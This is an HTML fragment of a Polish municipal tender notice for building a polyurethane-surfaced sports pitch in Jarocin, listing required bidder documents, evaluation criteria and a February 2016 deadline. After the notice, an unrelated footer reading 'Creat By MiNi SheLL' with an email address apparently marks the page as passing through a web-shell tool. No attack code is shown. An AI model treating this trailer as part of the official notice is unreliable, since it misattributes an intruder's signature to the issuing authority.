<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>co najmniej 1 robota polegająca na budowie boiska sportowego o nawierzchni poliuretanowej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny;
2)Kartę techniczną oferowanej nawierzchni potwierdzoną przez jej producenta;
3)Atest PZH dla oferowanej nawierzchni;
4)Autoryzacja producenta nawierzchni poliuretanowej, wystawioną dla Wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty.
2. Kosztorys ofertowy, zgodnie z treścią załącznika nr 9 do SIWZ.
3. Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony 
do reprezentowania Wykonawców w postępowaniu albo do reprezentowania 
w postępowaniu i zawarcia umowy.
4.Pełnomocnictwo, z którego wynika prawo do podpisania oferty, względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Gwarancja - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarocińskiego Funduszu Poręczeń Kredytowych Sp. z o.o. 
Ul. T. Kościuszki 15B
63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2016 godzina 10:00, miejsce: Urząd Miejski w Jarocinie 
Al. Niepodległości 10, 63-200 Jarocin, Kancelaria Burmistrza (pok. 32).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com